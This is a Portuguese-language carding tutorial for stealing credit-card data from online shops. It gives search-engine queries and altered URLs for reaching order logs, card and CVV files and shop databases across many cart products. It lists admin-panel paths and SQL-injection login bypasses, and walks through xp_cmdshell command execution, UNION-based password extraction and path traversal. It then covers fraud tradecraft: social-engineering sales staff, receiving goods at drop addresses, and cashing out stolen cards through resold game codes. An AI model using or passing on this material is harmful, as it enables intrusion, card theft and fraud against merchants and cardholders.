TUTORIAL CARDER

___________________________________________
Como achar Vunerabilidades nos seguintes servidores:

Ccbill
Aspcart
Cart32
CartCgi
CartPl
Ezmall2000
Midicart
Oscommerce
PdgCart
PfDisplay
Php Photo
Sales Cart
Sql Injection
WebStore
Sql Avan�ado
YABB
--------------------------------------------
CCBILL

V� at� um site de busca preferencialmente www.google.com.br e procure pelo

seguinte: allinurl: /ccbill/ . Ser�o listados v�rios sites relacionados ao assunto.
O pr�ximo objetivo ser� a substitui��o do /ccbill/ por alguns do caracteres
exatamente como segue o modelo abaixo.
www.athbrazil.com/ccbill/ Url Normal
www.athbrazil.com/ccbill/secure/order.log Url Alterada
www.athbrazil.com/ccbill/ Url Normal
www.athbrazil.com/ccbill/ccbill.log Url Alterada
www.athbrazil.com/ccbill/ Url Normal
www.athbrazil.com/ccbill/secure/currenty.log Url Alterada
www.athbrazil.com/ccbill/ Url Normal
www.athbrazil.com/ccbill/currenty.log Url Alterada
----------------------------------------------
aspcart:

V� at� um site de busca preferencialmente www.google.com.br e procure pelo

seguinte: allinurl: /backend/ . Ser�o listados v�rios sites relacionados ao
assunto. O pr�ximo objetivo � simples voc� ter� de substituir o /backend/ por
aspcart5.mdb exatamente como mostra o modelo abaixo.
www.athbrazil.com/backend/xxx.asp Url Normal
www.athbrazil.com/aspcart5.mdb Url Alterada
----------------------------------------------
CARTCGI:

V� at� um site de busca preferencialmente www.google.com.br e procure pelo

seguinte: allinurl: cart.cgi ou cartmanager.cgi . Ser�o listados v�rios sites
relacionados ao assunto. O pr�ximo objetivo ser� a substitui��o de cart.cgi ou
cartmanager.cgi por /cgi-bin/Admin_files/ exatamente como segue o modelo abaixo.
www.athbrazil.com/cart.cgi Url Normal
www.athbrazil.com/cgi-bin/Admin_files/ Url Alterada
www.athbrazil.com/cartmanager.cgi Url Normal
www.athbrazil.com/cgi-bin/Admin_files/ Url Alterada
------------------------------------------------
CARTPL
V� at� um site de busca preferencialmente www.google.com.br e procure pelo
seguinte: allinurl: cart.pl . Ser�o listados v�rios sites relacionados ao assunto.
O pr�ximo objetivo ser� a substitui��o de cart.pl por alguns do caracteres
exatamente como segue o modelo abaixo.
www.athbrazil.com/cart.pl Url Normal
www.athbrazil.com/target/cgi-bin/cart.pl?vars Url Alterada
www.athbrazil.com/cart.pl Url Normal
www.athbrazil.com/target/cgi-bin/cart.pl?env Url Alterada
www.athbrazil.com/cart.pl Url Normal
www.athbrazil.com/target/cgi-bin/cart.pl?db Url Alterada
-----------------------------------------------
MIDICART

V� at� um site de busca preferencialmente www.google.com.br e procure pelo

seguinte: allinurl: meny2.asp . Ser�o listados v�rios sites sobre o assunto. No
pr�ximo passo a seguir voc� ter� de substituir o meny2.asp por midicart.mdb
exatamente como mostra o modelo abaixo.
www.athbrazil.com/meny2.asp Url Normal
www.athbrazil.com/midicart.mdb Url Alterada
www.athbrazil.com/shop/meny2.asp Url Normal
www.athbrazil.com/shop/midicart.mdb Url Alterada

-------------------------------------------------
OSCOMMERCE

V� at� um site de busca preferencialmente www.google.com.br e procure pelo seguinte

allinurl: /oscommerce/ . Ser�o listados v�rios sites relacionados ao assunto. O
pr�ximo passo ser� acrescentar alguns caracteres junto a url do site exatamente
como segue o modelo abaixo.
www.athbrazil.com/oscommerce/ Url Normal
www.athbrazil.com/oscommerce/admin/orders.php Url Alterada
www.athbrazil.com/oscommerce/ Url Normal
http://www.athbrazil.com/oscommerce...dmin/orders.php Url Alterada
--------------------------------------------------
PDG CART

V� at� um site de busca preferencialmente www.google.com.br e procure pelo seguinte

allinurl: shopper.cgi ou shopper.exe . Ser�o listados v�rios sites relacionados ao
assunto. O pr�ximo passo ser� acrescentar um dos caracteres da lista abaixo
exatamente como no modelo.
www.athbrazil.com/cgi-bin/shopper.cgi Url Normal
http://www.athbrazil.com/cgi-bin/sh...PLATE=ORDER.LOG Url Alterada
www.athbrazil.com/cgi-bin/shopper.exe Url Normal
http://www.athbrazil.com/cgi-bin/sh...PLATE=ORDER.LOG Url Alterada
Lista de caracteres a serem adicionados ap�s shopper.cgi ou shopper.exe siga
exatamente como no modelo acima.

/PDG/cvv2.txt
/stats/cgi-bin/PDG_Cart/orders.txt
/cgi/PDG_Cart/order.log.%207,%200.94,%20/cgi-bin/PDG_cart/card.txt
/Admin_files/order.log
/Orders/order.log
/PDG_Cart/order.log
/PDG_Cart/shopper.conf
/cgi-bin/shopper.cgi?newpage=../../../../../../../../../etc/hosts
/cgi-bin/DCShop/Auth_data/auth_user_file.txt
/cgi-bin/DCShop/Orders/orders.txt
/cgi-bin/shopper.exe?key=&20&preadd=action&template=order.log
/cgi-bin/shopper.exe?search=action&keywords=%20&template=order.log
/cgi-bin/PDG
/cgi-bin/.../cc.log
/cgi-bin/.../cvv.csv
/cgi-bin/.../cc.csv
/cgi-bin/.../cc.txt
/cgi-bin/.../cvv2.txt
/cgi-bin/.../card.csv
/cgi-bin/.../cvv.txt
/cgi-bin/.../order.csv
/cgi-bin/.../order.txt
/cgi-bin/.../card.log
/cgi-bin/.../card.txt
/cgi-bin/.../orders.txt
/cgi-bin/.../cvv2.csv
/cgi-bin/.../debug.txt
/cgi-bin/.../mc.log
/cgi-bin/.../ccv.csv
/cgi-bin/.../authorize.cvs
/cgi-bin/.../authorizenets.old
/admin/cgi-bin/.../card.txt
/cgi-bin/shoppper.exe/.../card.log
/cgi-bin/shoppper.exe/.../card.txt
/cgi-bin/.../ccv.log

/cgi-bin/.../debug.log
/cgi-bin/.../ccv.txt
/cgi-bin/.../mc.txt
/cgi-bin/.../order.log
/cgi-bin/.../mc.csv
/cgi-bin/.../cvv2.log
/cgi-bin/.../cvv.log
/cgi-bin/.../authorizenet.log
/admin/cgi-bin/.../card.csv
/cgi-bin/.../shopper.conf
/admin/cgi-bin/.../card.log
/cgi-bin/shoppper.exe/.../order.csv
/cgi-bin/shoppper.exe/.../order.log
/cgi-bin/shoppper.exe/.../order.txt
/stats//cgi-bin/.../order.csv
/shopper.exe/cgi-bin/.../shopper.conf
/cgi-bin/cgi-bin/.../order.log
/PDG_Cart/order.log
/cgi-bin/shoppper.exe/PDG_cart/order.log
/cgi-bin/
/cgi-bin/shoppper.exe/PDG_cart/order.log
/cgi-bin/PDG_Cart/order.log
/PDG_Cart/order.log
/PDG_Cart/
/cgi-bin/PDG_cart/card.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cgi-bin/shopper.cgi/&TEMPLATE=ORDER.LOG
/PDG_Cart/authorizenet.txt
/pdg_cart/order.log
/orders.txt
/cgi-bin/shopper.cgi&TEMPLATE=ORDER.LOG
/cvv.mbf
/cvv.dbf
/cvv.ldf
/PDG_Cart/cc.txt
-----------------------------------------
SALES CART

V� at� um site de busca preferencialmente www.google.com.br procure pelo seguinte

allinurl: mall/lobby.htm . Ser�o listados v�rios sites relacionados ao assunto. O
pr�ximo passo ser� a substitui��o do mall/lobby.htm por algum dos caracteres
exatamente como no modelo abaixo.
www.athbrazil.com/mall/lobby.htm Url Normal
www.athbrazil.com/fpdb/shop.mdb Url Alterada
www.athbrazil.com/shoponline/mall/lobby.htm Url Normal
www.athbrazil.com/shoponline/fpdb/shop.mdb Url Alterada
---------------------------------------------------
SQL INJECTION

Bom est� vulnerabilidade se trata da localiza��o do painel de controle de um site

onde apenas o administrador do site tem acesso.O acesso � usado para efetuar
eventuais mudan�as na home page e eventuais conferencias de pedidos em caso de e-
commerce.
Para chegar at� o painel de controle primeiramente voc� deve localiza-lo usando
"Strings" que se trata de caracteres que complementam a url do site afim de
encontrar o painel. Veja como seria olhando o modelo baixo.
www.amazonrecords.com.br Url Normal
www.amazonrecors.com.br/admin/index.asp Url Alterada
Ap�s a localiza��o do painel voc� ter� usar carecteres como login e senha at�
conseguir entrar com exito no site.Logo abaixo voc� ver� rela��o de "Strings" e
caracteres a ser usado como login e senha nos pain�is de controle.

Strings que devem ser adicionadas junto a url do site assim como no modelo acima.

/admin/default.asp
/admin/index.asp
/admin/login.asp
/admin/password.asp
/admin/senha.asp
/login/login.asp
/adm/login.asp
/adm/index.asp
/adm/default.asp
/login/index.asp
/login/default.asp
/webmaster/login.asp
/webadmin/default.asp
/webadmin/index.asp
/webadmin/default.asp
/menu_admin/default.asp
/menu_admin/index.asp
/menu_admin/login.asp
/noticias/admin/
/news/admin/
/cadastro/admin/
/portal/admin/
/site/admin/
/home/admin.asp
/home/admin/index.asp
/home/admin/default.asp
/home/admin/login.asp
/web/admin/index.asp
/web/admin/default.asp
/web/admin/login.asp
/home/adm/login.asp
/home/adm/senha.asp
/home/adm/index.asp
/home/adm/defaul.asp
/menu/admin/index.asp
/menu/admin/default.asp
/menu/admin/login.asp
/menu/admin/admin.asp
/painel/admin/admin.asp
/painel/admin/login.asp
/painel/admin/index.asp
/painel/admin/default.asp

Caracteres que devem ou podem ser usados como login e senha ap�s localiza��o do
painel.

' or ' 1
b' or ' 1='
' or '1
' or '|
' or 'a'='a
' or ''='
' or 1=1--
') or ('a'='a
' or '1'='1
admin
shell
root

Lembrando essa vulnerabilidade se baseia na falha do administrador nem todos os

sites est�o vulneraveis.

------------------------------------------------
WEBSTORE

V� at� um site de busca preferencialmente www.google.com.br e procure pelo seguinte

allinurl: web_store.cgi . Ser�o listados v�rios sites relacionados ao assunto. O
pr�ximo passo ser� a substitui��o do web_store.cgi por Admin_files/order.log
exatamente como segue o modelo abaixo.
www.athbrazil.com/web_store.cgi Url Normal
www.athbrazil.com/Admin_files/order.log Url Alterada
------------------------------------------------
ADVANCED SQL INJECTION

1 - O que � sql injection ?

� um truque para injectar comandos SQL via paginas web , j� que qualquer pagina web
recebe parametros do usuario e os transmite para o banco de dados .

Imaginemos por exemplo uma pagina web escrita em asp que nos pe�a o username e a
password . O que a pagina web vai fazer � enviar o username e a password para o
banco de dados e este verificar se � um user ou password validos !

Ent�o porque n�o inserimos c�digos SQL ? OK ! Isto s� n�o � teoria como �
poss�vel !

2 - O que � preciso ?
Qualquer web browser

3 - Onde eu come�o ?
Tente olhar por paginas que posssuam logins , submits , feedback search etc , enfim
essencialmente paginas que possuam codigos asp ! Mas n�s sabemos que os c�digos em
asp s�o interpretados no server ! ok ! tente olhar para o c�digo HTML ent�o . Por
exemplo :

Vemos aqui c�digos delimitados por e que podem ser exploitados.

4 - Que linguagens s�o vulner�veis ?

Paginas web com ASP, JSP, CGI, ou PHP , por exemplo observe esta pagina
http://windefense/index.asp?id=10

5 - Como testar se uma pagina � vulner�vel ?

Tente come�ando com um simples truque em um campo que receba parametros ex :

username

Password
coloque :
hi' or 1=1--

Podemos testar assim :

username: hi' or 1=1--

Password: hi' or 1=1--
Ou com a seguinte URL

http://windefense/index.asp?id=hi' or 1=1--
N�s tinhamos visto antes um form vulner�vel , ele segue abaixo :

Bem podemos fazer umas trocas para nossos intuitos !( Veja o html da pagina alvo e
fa�a altera��es e depois salve)

http://windefense/Search/search.asp method=post>
Se der certo podemos nos logar sem qualquer username ou password !

6 - Como executar comandos remotos com SQL injection ?

Se podemos injectar comandos sql ent�o estamos aptos a correr comandos com boas
permiss�es , e note que o MS SQLserver corre por default com privil�gios de sistema
! ( Equivalente a privil�gios de administrador )

Observe por exemplo a seguinte string que nos permite executar comandos no server :

master..xp_cmdshell

Podemos tentar uma execu��o de comando :

'; exec master..xp_cmdshell 'ping 10.10.1.2'--

Tente usar a cota dupla(") ou a simples(') se nao der certo

7 - Ca�ando dados do banco de dados utilizando ODBC error message

N�s podemos manipular os erros ODBC do banco de dados para trazer dados do banco de
dados observe por exemplo esta URL normal :
http://windefense/index.asp?id=10

n�s podemos tentar unir ( UNION ) o valor '10' com outra string do banco de dados ,
observe :

http://windefense/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM

INFORMATION_SCHEMA.TABLES--

A tabela INFORMATION_SCHEMA.TABLES contem informa��es sobre todas as tabelas do

sistema com a string TABLE_NAME podemos receber informa��es sobre nomes de tabelas
no banco de dados .

SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

Retorna o nome da primeira tabela do banco de dados . Se o sql server tenta

converter a string UNION para um integer ocorre o erro seguinte :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL
Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a
column of data type int. /index.asp, line 5

Algo nos interessa aqui . Podemos ver que provocamos um erro e retornamos o nome da
1� tabela do banco de dados que � "table1" . Para obter o nome da proxima tabela
inserimos a seguinte query :

http://windefense/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM

INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

Ou procurar dados com uma query , inserindo um comando sql de compara��o (LIKE) :

http://windefense/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM

INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

Onde o output � o seguinte :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL
Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login'
to a column of data type int. /index.asp, line 5

Neste caso nos retornamos com a string , '%25login%25' na tabela escolhida

(TABLE_NAME) , contendo a string "login" que retornou o login do admin que �
"admin_login".

Podemos mapear tabelas com a seguinte string :

INFORMATION_SCHEMA.COLUMNS

http://windefense/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

Output :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL
Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to
a column of data type int. /index.asp, line 5

Agora n�s podemos usar a string NOT IN () para trazer o nome da proxima coluna :

http://windefense/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN
('login_id')--
Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL
Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name'
to a column of data type int. /index.asp, line 5

Agora se raciocinarmos um pouco podemos obter outras coisinhas importantes como

nomes colunas de id's , passwords , detalhes etc com a seguinte query :

http://windefense/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM

INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN
('login_id','login_name','password',details')--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL
Server Driver][SQL Server]ORDER BY items must appear in the select list if the
statement contains a UNION operator. /index.asp, line 5

Como retornar dados :

Vimos acima que podemos identificar nomes de tabelas , colunas etc . Agora o bom
disso � que podemos utilizar a mesma tecnica para retornar dados da mesma , como
por exemplo retornar o 1� "login_name" da tabela "admin_login" com a seguinte query
:

http://windefense/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL
Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a
column of data type int. /index.asp, line 5

J� conhecemos o login_name que � "neo" agora precisamos conhecer a password com a

sequinte query

http://windefense/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login

where login_name='neo'--

Output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL
Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a
column of data type int. /index.asp, line 5

Podemos ver realmente que retornamos aqui uma password "m4trix" para um user
"neo" .

Como retornar passwords com valor numerico !

Um problema com este tipo de retorno � que valores numericos nao podem ser
retornado via uma query do tipo :

http://windefense/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login

where login_name='trinity'--

Se o usuario possui uma password do tipo : "31173" provavelmente teriamos no nosso

browser o seguinte : "Page Not Found"
Para resolver este problema nos podemos juntar uma string numerica com alguns
alfabetos :

http://windefense/index.asp?id=10 UNION SELECT TOP 1 convert(int, password

%2b'%20morpheus') FROM admin_login where login_name='trinity'--

Simplesmente usamos o sinal de (+) para juntar a password com qualquer texto que
n�s queremos (Codigo ASCII para '+' = 0x2b). N�s juntamos com um espa�o(%20) a
palavra morpheus . E manualmente chamando a fun��o convert() para converter '31173
morpheus' dentro de um integer, o servidor sql retorna o seguinte erro :

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft][ODBC SQL
Server Driver][SQL Server]Syntax error converting the nvarchar value '31173
morpheus' to a column of data type int. /index.asp, line 5

Podemos ver que a password "31173" � retornada antes da string "morpheus"

Updates , e inser��o de dados !

Se podemos retornar dados de uma tabela certamente que podemos updatear(actualizar)

e inserir dados dentro do banco de dados :

Imaginemos o seguinte cenario podemos trocar usernames , passwords , inserir novos

users , novas passwords etc .

Tentemos trocar a password para o user "neo" :

UPDATE = Comando sql para actualizar dados

http://windefense/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5'

WHERE login_name='neo'-- Agora o user "neo" tem uma password com o nome "newpas5"

INSERT = Comando sql para inserir dados

Para inserir dados na database usamos a seguinte query :

http://windefense/index.asp?id=10; INSERT INTO 'admin_login' ('login_id',

'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

Podemos notar aqui novos valores da tabela admin_login como : ('login_id',

'login_name', 'password', 'details') para valores de : 666,'neo2','newpas5','NA'

Podemos nos logar como user "neo" e pass "newpas5"

-----------------------------------------------
YaBB.pl

V� at� um site de busca preferencialmente www.google.com.br e procure pelo

seguinte: allinurl: YaBB.pl . Ser�o listados v�rios sites relacionados ao assunto.
Pr�ximo objetivo ser� a substitui��o do YaBB.pl pelo caracteres exatamente como
segue o modelo abaixo.
www.athbrazil.com/YaBB.pl Url Normal
http://www.athbrazil.com/cgi-bin/Ya..../etc/passwd%00 Url Alterada

Isso n�o � um problema de bug ou vulnerabilidade do banco de dados uma vez que a
t�cnica
do SQL Injection funciona em qualquer banco de dados mesmo Oracle mas sim uma falha
do desenvolvedor da p�gina.
Voce tentara achar o painel de administracao do site online e iria inserir comandos
strings se o site estiver aceitando
caracteres uala voce entra pois se o admin colocou algumas linhas para nao aceitar
os caracteres ou seja as strings no
codigo fonte do site babou.

O tio vai explicar um pouco sobre isto e que muitos dizem ser antiga e nao
conseguir nada com isto bla bla bla eu consigo
Bem pros ze ruela ze mane bundao ai vao as dicas.

Consiste em achar a tela de administracao online do site achando voce ira inserir
as strings

diretorios que tentara achar no site

exemplo: www.amx.com.br/admin/index.asp (Atencao este site e so de exemplo)

Endereco: http://www.amx.com.br/admin/index.asp e vai tentando estes diretorios e

se tiver o painel online tenta inserir
nos campos de login e senha as strings.

Diretorios e um scan de sql voc� escontra abaixo:

http://www.olharhacker.(**).com.br/scan_sql.zip

Strings (as strings inserir nos campos login e senha)

A string que passa pelos e-mails �: eu@eu.com'or'.11'='.11

usuario='geek' senha='s3nh4'
usuario='' or '1' senha='s3nh4'
usuario= 'or' senha= 'or'
usuario=' or ' 1 senha=' or ' 1
usuario='1' = '1' senha='1' = '1'
usuario=' or '1'='1 senha=' or '1'='1
usuario='' or '1'='1' senha='' or '1'='1'
usuario="senha" senha="senha"
usuario="password" senha="password"
usuario="teste" senha="teste"
usuario="123" senha="123"
usuario="1234" senha="1234"
usuario="12345" senha="12345"
usuario="VB" senha="VB"
usuario="visual" senha="visual"
usuario="basic" senha="basic"
usuario=' or senha='teste senha=' or senha='teste
usuario=' or senha='login senha=' or senha='login
usuario=' or email like 'flavio% senha= ' or email like 'flavio%
usuario='or '1'='1' order by 1 -- senha='or '1'='1' order by 1 --
usuario=' or '1'='1' order by 1 -- senha=' or '1'='1' order by 1 --
usuario=' or 1=1-- senha=' or 1=1--
usuario='or''=' senha='or''='
usuario=' or 'a'='a senha=' or 'a'='a
usuario=') or ('a'='a senha=') or ('a'='a
usuario=b' or ' 1=' senha=b' or ' 1='
usuario=' or '| senha=' or '|
usuario=123'or'= senha=123'or'=
usuario=admin'- senha=admin'-
usuario=' or '1=true senha=' or '1=true
usuario=7' or ' 1 senha=7' or ' 1
usuario=root senha=root
usuario=shell senha=shell
usuario=admin senha=123456
usuario=admin senha=admin
Usuario=�;shutdown-- senha=�;shutdown--

Burrice ou esquecimento com logins padroes ou de testes se o site estiver hospedado

na locaweb
podera tentar tamb logar com o nome da locaweb podera ver no site da
www.registro.br os nomes e
os emails e tentar logar com eles ou com o nome do site ou do servdor onde hospeda
o site.

Ou tambem podera elaborar um email e mandar para onde o site esta hospedado dizendo
ter um
site de vendas online e esta procurando um servidor novo e gostaria de conhecer os
servicos
e se caso teria servicos de administracao online do site (ou seja o painel online
que e seu alvo)
se caso o cabra do suporte confirmar o que voce precisa pergunte se existe algum
que poderia
usar para teste para conhecer pois muitos tem logins padroes para teste e mais uma
vez se o
cabra falar o login padrao de teste deles tenta logar no seu site alvo com este
login de teste
pois para a nossa sorte muitos admin esquecem de trocar o login padrao e a senha do
painel
online.

Existem outras strings mais voce tambem pode criar as suas

Bem tente procurar os sites no bom e famoso google veja em outros buscadores tambem
ou procure sites de vendas online

Mais bugs loja asp

ir no google botar allinurl:loja/cadastro.asp e trocar loja/cadastro.asp por

loja/cadastro.mdb

Para evitar o acesso do SQL Injection de limites no tamanho do campo login (n�o
permitir mais de 8 ou 10
caracteres) e proibir o uso de caracteres especiais como aspas, ap�strofes, sinais
de + e -.

ou Coloque no formulario do site

function sqli(valor) sqli = replace(valor,"'","++") end function Para reverter

function sqlv(valor) sqlv = replace(valor,"++","''") end function.

CARDEANDO

Bom, galera acho que chegamos a um ponto de nossas vidas onde que todos sabem o que
� carder e acho que n�o temos nem mais a necessidade de ficar escrevendo o que �
carder pois bem, acho que devemos colocar em nossas cabe�as que carder � diferente
de comprador virtual ou comprador impulsivo ham n�o entendeu? Ent�o vou explicar de
forma passo a passo, por�m n�o quero aqui ficar esnobando uns ous outros e sim
quero esclarecer o que � carder.

Carder: Hack do Cart�o de Cr�dito aproveita vulnerabilidades e exploram com maior

facilidade e consegue utilizar os dados capturados para realizarem compras via
Internet sem pagarem e terem maiores problemas com o mesmo.

Est� atenta a nova tecnologia, conhecem o ch�o e toda a estrutura do e-commerce

nacional como estrangeiro, sabe a utilizar engenharia social para obter seus dados
n�o s� na Internet como fora dela, conhece a maioria se n�o toda a estrutura de
banco de dados existente no mercado.

Conhecendo seu alvo ele sabe como atacar da melhor forma poss�vel e tendo o melhor
n�vel de �xito em suas investidas contra o com�rcio eletr�nico.

Leva um seguinte tema em sua vida � Nada � 100% Seguro e N�o s� de Cart�o vive o
Carder e sim de todo conhecimento e investida nele apostados para obter seus dados
e seus lucros �

Resumindo Carder n�o � comprador e sim um estudioso especialista em e-commerce e

cart�o de cr�dito.

Comprador Virtual: Se resume em todos as pessoas que navegam na internet e realizam

suas compras na comodidade de suas casas, por�m o comprador virtual dentro da
Hierarquia Carder nada mais � que um Adolescente que entra em canais de IRC e
come�am avacalhar dentro do Chat pedindo cart�o de cr�dito para comprar seus
brinquedinhos, s�o pessoas que pouco conhece do ambiente carder e n�o possui o
b�sico das t�cnicas para realizarem ataques, s�o pessoas sempre duras de cart�o de
cr�dito, se o grupo n�o passa ela n�o tem e quando tem n�o sabe se vai conseguir
pois foi o amigo que passou e ela n�o sabe se � Full ( exclusivo ) dela ou se �
Ruim pois foi passado por terceiros.

Resumindo Comprador Virtual nada mais � que pessoas brincando de aventuras e

comprando com dados de terceiros fornecidos por terceiros e que n�o foram elas que
pegaram e sim outras pessoas que os passaram, n�o entende de vulnerabilidade e
pouco sabe de Engenharia Social, pois se soubessem ao menos utilizar poderia tentar
explorar a vulnerabilidade humana e se safar de ser chamado de Comprador Virtual e
seguir uma vida est�vel sendo chamado de um Carder Social Engineering.

N�o quis pegar pesado mais n�o estou aqui para contar hist�ria para crian�a dormir
e escrever s� palavras bonitas, na real a verdade tenque ser dita.

CARDEANDO.

H� isso � entrar no site de e-commerce v� se aceita cart�o de cr�dito e ir as

compras, Correto?

Correto nada, isso � coisa de pessoas que s�o impulsivas em realizar compras na
Internet, o verdadeiro processo para chegar as conclus�es de que a loja � um bom
alvo para seu ataque.
1� Processo: Identificando a Loja

Nesse processo vamos saber se realmente a loja pode receber nossa visita e se ela
poder� nos visitar para nos pegar =o)

Visite os Links e veja se o Certificado de Seguran�a do site � um link que mostre

as informa��es de data do certificado e se realmente a loja � um ponto confi�vel ou
se n�o � mais umas das armadilhas tanto dos seus amiguinhos carders como dos toca
preta hehehe.

Procure obter informa��es dentro da camada WEB, ou seja, verifique se t�m

informa��es de como PAGAR � PRAZO DE ENTREGA � CONTATO � TELEVENDAS � POLITICA E
PRIVACIDADE.

2� Processo: Social Engineering ou seja se as informa��es n�o foram suficientes

para voc� saber se a loja � segura para voc� aplicar o golpe a melhor maneira � a
que vou descrever agora:

aplique engenharia social no televendas da loja, u� mais como?

Seguinte pegue o numero do televendas e ligue, mais n�o atenda o telefone e diga
que voc� � um carder e quer fraudar a loja e quer saber se � seguro, pelo contr�rio
se passe como um cliente e ligue inocentemente e diga que esta vendo o cat�logo de
produtos via Web e quer saber o pre�o etc.. Formas de pagamento e etc... Mais agora
vem o ataque. Chega como quem n�o quer nada e diga ao atendente � seguro comprar
nessa loja via Internet?

E pergunte porque.. Quando ele responder essas perguntas diga a ele que se seus
dados for roubados e mal utilizados o que eles ir�o fazer, qual a garantia de
seguran�a e provid�ncia a serem tomadas. Pergunte o m�ximo que puder e como o
Cliente sempre tem a raz�o e estar em seu direito de estar preocupado com seus
dados o Atendente ira responder e fazendo isso voc� j� conheceu a terra em que est�
pisando e automaticamente vai verificar o grau de perigo em sua investida e vai
decidir se vai ou n�o cardear nessa loja.

3�Processo: Entrega

Esta � hora mais importante,a hora que voc� estar� recebendo o pedido.

Nos dias atuais � um pouco mais complicado voc� receber seu pedido,pois antigamente
todas as lojas entregavam em lanbux,caixa postal etc...Hoje nem todas entregam mas
caso voc� queira alugar uma caixa postal no correio fique a vontade. A forma mais
f�cil � pedir para aquele seu amigo de confian�a receber pra voc�,de preferencia um
que n�o tenha computador,que seja esperto e que tenha um bom papo. Mas pra que
isso? Caso de rolo ele ir� saber como se comportas.
Ele ter� que ficar atento com o movimento da rua,caso ele observe algo estranho o
melhor a fazer � n�o receber o pedido.Caso pe�am pra apresentar rg fale que sabe o
n�mero de cabe�a. OBS: saiba pelo menos quantos n�meros tem um RG. Mande seu pedido
para presente com cart�ozinho de amor para que n�o haja desconfian�a .

Transformando cc inter e paypal em dinheiro na m�o com dados virtuais

Comprar e vender dados virtuais pode ser uma maneira muito segura e eficaz de tirar
algum dinheiro de ccs internacionais e paypals.

Primeiro: Oq exatamente seria dado virtual?

Procure por "mmorpg" no google e de uma olhada para ver c entende doq c trata(c j�
souber ou c tiver j� alguma id�ia continue lendo q vou explicar de forma r�pida.)

Mmorpg = Massive Multiplayer Online Role Play Game

Esse e um tipo de jogo onde existe taxa de inscri��o e mensalidade para jogar nos
servidores do jogo.

Com isso, todo conte�do do jogo vale dinheiro, pois tempo literalmente vale
dinheiro nesses jogos.

Vantagens de seguran�a:

Primeiro: Dados virtuais quando comprados s�o entregues no mesmo momento, e n�o
tendo como banir o c�digo ap�s o verdadeiro dono estornar pois ningu�m grava qual
cart�o compro qual c�digo

Segundo: Todo trabalho ilegal e feito em terra gringa, apenas a venda do code e no
Brasil e nesse ponto da opera��o j� esta tudo legal, assim dificultando e muito que
algu�m lhe pegue.

Segue uma lista de jogos q podem vir a render algum dinheiro:

Lineage2

Ultima Online

Lineage

Final Fantasy XI

City of Heroes

Dark Age of Camelot

Everquest

Everquest 2

Star Wars Galaxies

World of Warcraft
E mais...

Oque cardiar? Oque vender?

Com cc inter:

Cd-key do jogo: valor m�dio de 50 d�lares

(esse tipo de jogo e vendido tanto caixa com cd e manual + cd-key ou apenas a cd-
key e o comprador recebe uma pagina para download do jogo)

Game Card: valor m�dio 15 dolares por m�s sendo de 2 ou 3 meses cada game card.

(numero tipo pr�-pago N meses)

Com paypal:

Voc� usara o ebay para compra com paypal, podendo comprar os itens acima ou leiloes
de personagens j� fortes no servidor ou itens como dinheiro ou uma arma no valor
desde 10 d�lares ate 5000 6000 mil d�lares.

Transformando em reais:

Depois de comprar algum dos itens virtuais acima voc� ter� q procurar compradores
para seus c�digos. Existem f�runs brasileiros de todos os jogos listado acima onde
o dinheiro e bem movimentado pelo jogo ser pago.

Anuncie e venda por deposito banc�rio.

Precau��es:

N�o venda muito barato, nem mesmo deixe que fiquem sabendo que o item e cardiado.
Pois ningu�m mais ir� comprar.

GOGOGO vai trampa

Agora q voc� j� sabe a teoria e partir pra pratica, procure pelos sites cardeaveis
e foruns para a venda.

Segue 1 site cardiavel q vende cd key 50$ de Lineage2 e City of Heroes.

http://www.plaync.com

Crie uma conta, ative com o c�digo enviado para o seu e-mail, ai v� em manage,
logue na conta criada e procure por purchase code. (n�o use o mesmo cc em mais de 2
contas pois e banido)

PHP-SHOP

O phpShop � uma aplica��o PHP- baseada do e-comerce e as ofertas do phpShop da

estrutura do desenvolvimento de PHP as caracter�sticas b�sicas necessitadas
funcionar um Web site bem sucedido do e-comerce e estender suas potencialidades
para o phpShop m�ltiplo das finalidades usam uma estrutura agrad�vel do
desenvolvimento que permita que os colaboradores da correia fotorreceptor estendam
facilmente sua funcionalidade com o uso dos m�dulos. Sua arquitetura da correia-
caixa faz f�cil de compreender e trabalhar com, ao fornecer a ger�ncia que poderosa
da fun��o as potencialidades para sua aplica��o da correia fotorreceptor
necessitam.

� uma das solu��es dirigida SQL as mais populares do e-comerce do php dispon�veis
hoje.

Vulnerabilidade Da Inje��o do Sql: o phpShop � � inje��o do SQL ao atualizar uma

